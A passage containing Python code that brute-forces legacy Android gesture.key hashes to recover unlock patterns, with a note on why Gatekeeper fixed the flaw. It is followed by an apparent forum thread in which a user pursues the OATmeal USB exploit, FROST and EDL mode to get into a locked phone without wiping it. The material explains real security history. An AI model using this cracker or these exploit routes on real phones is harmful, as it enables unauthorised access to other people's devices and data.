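    """Cell the finger passes over between a and b, or None (adjacent or knight move)."""
    ra, ca = divmod(a, GRID)
    rb, cb = divmod(b, GRID)
    if (ra + rb) % 2 or (ca + cb) % 2:
        return None
    return ((ra + rb) // 2) * GRID + (ca + cb) // 2


def valid_patterns(min_len: int = 4, max_len: int = 9) -> Iterator[List[int]]:
    """Every pattern the lock screen can record: distinct cells, no skipped cell."""

    def extend(path: List[int], used: int) -> Iterator[List[int]]:
        if len(path) >= min_len:
            yield list(path)
        if len(path) == max_len:
            return
        last = path[-1]
        for nxt in range(GRID * GRID):
            if used & (1 << nxt):
                continue
            mid = _midpoint(last, nxt)
            if mid is not None and not used & (1 << mid):
                continue  # the lock screen would have inserted `mid` first
            path.append(nxt)
            yield from extend(path, used | (1 << nxt))
            path.pop()

    for start in range(GRID * GRID):
        yield from extend([start], 1 << start)


def gesture_key_digest(pattern: List[int]) -> bytes:
    """Contents of a legacy gesture.key for this pattern."""
    return hashlib.sha1(bytes(pattern)).digest()


def crack_gesture_key(digest: bytes) -> Optional[List[int]]:
    """Return the pattern whose gesture.key matches `digest`, or None."""
    for pattern in valid_patterns():
        if gesture_key_digest(pattern) == digest:
            return pattern
    return None


def count_patterns() -> int:
    return sum(1 for _ in valid_patterns())


if __name__ == "__main__":
    # Constructed sample: an "L" shape across the top row and right column.
    sample = gesture_key_digest([0, 1, 2, 5, 8])
    print(count_patterns(), "valid patterns")
    print("recovered:", crack_gesture_key(sample))
```

The whole search finishes in a few seconds because the legacy format has no salt and no work factor; that is precisely the weakness Gatekeeper removed, by putting the slow, device-bound part of the verification inside the TEE where a dumped file is of no use.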
Your thread was quite confusing at first as I wasn't sure what to look for exactly :/
That being said, you have your phone locked and you want to unlock it. However you don't want to flash or reset your device, you don't have root permission, you don't have debugger mode on and you don't want to unlock the bootloader, correct?
Basically you're asking for the impossible...
All I can think of is FROST attack. See article for details and source code.
You can also send your device to your nearest Sony service center and they can probably fix it with no memory loss.
Other than that, you MUST hard reset your phone if you want it back.
However, should you come to your senses and realize the reality of the situation, where you shouldn't be picky about it, then you can start with flashing a custom recovery. Or using third-party programs like dr.fone.
XDHx86 said:
Basically you're asking for the impossible...
Thanks for getting back to me, yes I realise it is asking for the impossible. I'll have a research around that article and see if I can find some information on how to write the program to dump the contents over USB. I tried Dr Fone but that only gave me the option of a hard reset.
My current line of attack is an exploit over USB called OATmeal, whereby a Raspberry Pi is used over OTG with a filesystem label of "../../data", it allows the filesystem of the phone to be mounted and data written off. It is a little complex and so I am struggling a bit with getting it to work. The team over at Project Zero have a good write-up of it so I'm following that and the POC at exploit-db to guide me through it.
I think I will be able to get the USB part to work but I'm not sure if I have to write a Java file to automatically run when /data is mounted, or if that's even possible.
Forenzo said:
My current line of attack is an exploit over USB called OATmeal
Not to make you frustrated, but this is an old exploit and I highly doubt it'd work on your device, unless your device security patch is older than 9-2018.
And you can't rollback on your security patch.
You should really consider flashing TWRP or other custom recovery. You have no other option.
XDHx86 said:
Not to make you frustrated, but this is an old exploit and I highly doubt it'd work on your device, unless your device security patch is older than 9-2018.
Fortunately the device hasn't been updated since around 2-2018 or 3-2018 so any exploit I can find from then onwards that I can use will be great. I really do get that the only realistic option is to unlock the bootloader and flash the recovery but the data needs to be recovered and I absolutely don't want to wipe it.
If I can't do it then it will gather dust until the end of time...
It seems that no matter what I say you won't realize the situation you are in.
I can only suggest to NEVER mess with the phone circuits or the motherboard. No matter which stupid YouTube tutorial you saw. Those guys are douchebags who only know how to get views and don't care for whatever you/they do to your device.
Needless to say messing with the circuits or the motherboard require dexterity and experience which I'm positive you don't have.
As I said before if you send it to an authorized service center, then they can help you with it without memory loss.
Sending your device to a service center isn't an insult or an act of low self-esteem. Service centers exist for a reason, and they're basically geeks who are too passionate about electronics and decided to make a living out of it.
Or maybe you can somehow use the EDL mode on the phone.
In Qualcomm devices the EDL mode is locked and can only be accessed by an authorized person who has the security code of your device. I don't know if it even exists in MTK devices.
Should you actually manage to boot into EDL mode - assuming it exists and is unlocked - then BEWARE: EDL mode is very low level and any command can directly affect the kernel or compromise the system. Don't use commands if you're not sure what they do.
You can use EDL mode to recover the data from the phone then wipe it clean, then restore the data.
You cannot access memory with EDL mode, but you can access the current image on your device. And from which you can get the key file.
EDL mode is a very very powerful tool (Much more powerful than debugging, fastboot, or anything you may know of) as it doesn't need unlocked bootloader to use it and through which you can do anything to your device including flashing other ROMs.
Good luck on your impossible quest. Make sure to post updates should you find yourself stuck.